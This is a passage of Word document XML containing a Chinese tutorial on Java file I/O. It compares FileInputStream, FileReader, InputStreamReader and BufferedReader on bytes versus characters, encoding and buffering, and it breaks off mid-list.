          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取一个文件时，用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我想</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>子类的作用也就在于这个小分工吧。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>联系与区别</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）字符与字节：</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类以二进制输入</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输出，</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>速度快且效率搞，但是它的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（）方法读到的是一个字节（二进制数据），很不利于人们阅读，而且无法直接对文件中的字符进行操作，比如替换，查找（必须以字节形式操作）；</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类弥补了这个缺陷，可以以文本格式输入</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输出，非常方便；比如可以使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>while((ch = filereader.read())!=-1 )</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>循环来读取文件；可以使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>readLine()</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法一行一行的读取文本。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）编码</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">InputStreamReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，它是字节转换为字符的桥梁。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>你可以在构造器重指定编码的方式，如果不指定的话将采用底层操作系统的默认编码方式，例如</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">InputStreamReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>涉及编码转换</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指定编码方式或者采用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>默认编码</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，可能在不同的平台上出现乱码现象！而</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以二进制方式处理，不会出现乱码现</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>象</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>因此要指定编码方式时，必须使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">InputStreamReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类，所以说它是字节转换为字符的桥梁；</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缓存区</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    BufferReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类用来包装所有其</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作可能开销很高的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）规范用法</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>总结以上内容，得出比较好的规范用法：</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
